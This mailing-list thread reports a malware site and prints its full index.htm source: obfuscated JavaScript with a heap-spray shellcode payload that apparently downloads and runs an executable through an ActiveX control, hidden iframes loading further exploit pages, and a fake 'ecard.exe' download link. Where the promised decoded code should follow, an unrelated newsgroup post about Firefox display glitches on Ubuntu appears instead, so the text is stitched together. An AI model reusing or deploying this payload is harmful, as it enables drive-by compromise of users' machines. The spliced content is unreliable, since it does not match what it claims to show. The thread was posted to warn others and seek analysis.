I am unable to reproduce this strange event again, but it definitely
happened so I wonder if someone can take a look at it.
Andrés
-------------------------------------------------------------------------
Hello, I've accidentally entered a malware site by following an e-mail link
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could to be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.
I got the following code from the "index.htm" page:
___
<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to
view this ecard, please <a href="/ecard.exe">click here</a> to view in
its original format.
</body>
</html>
___
The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___
Path:
border1.nntp.dca.giganews.com!nntp.giganews.com!postnews.google.com!p77g2000hsh.googlegroups.com!not-for-mail
Newsgroups:
mozilla.support.firefox
Organization:
http://groups.google.com
Lines:
18
Message-ID:
<1182746345....@p77g2000hsh.googlegroups.com>
NNTP-Posting-Host:
72.142.180.124
MIME-Version:
1.0
Content-Type:
text/plain; charset="iso-8859-1"
X-Trace:
posting.google.com 1182746346 30540 127.0.0.1 (25 Jun 2007 04:39:06 GMT)
X-Complaints-To:
groups...@google.com
NNTP-Posting-Date:
Mon, 25 Jun 2007 04:39:06 +0000 (UTC)
User-Agent:
G2/1.0
X-HTTP-UserAgent:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201
Firefox/2.0.0.4 (Ubuntu-feisty),gzip(gfe),gzip(gfe)
Complaints-To:
groups...@google.com
Injection-Info:
p77g2000hsh.googlegroups.com; posting-host=72.142.180.124;
posting-account=0SOUng0AAACu7zVOKRLT1jesEMn1KjB7
Bytes:
1747
Xref:
number1.nntp.dca.giganews.com mozilla.support.firefox:58015
Im running FF2 on ubuntu and ive been struggling with a problem for a
while:
Randomly, pages will load (i.e. at the level of http) but the content
will not display. So for example I may be at one page, click a link,
see the progress bar indicate that all the data has been transferred,
but nothing happens.
It just sits there. By resizing my window the display WILL CHANGE
correctly, but only by doing that.
Please tell me someone has had this prob. This is such a pain in the
ass. I love this browser but its killing me --just killing me -- to
have to resize sometiems every flipping page load... *cries*...
*sobs*...
--lstewart
either an extensions is causing this -
"https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
or it's the theme, you are using , which is misbehaving -
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.
Thanks for your reply, but add-ons are certainly not the cause.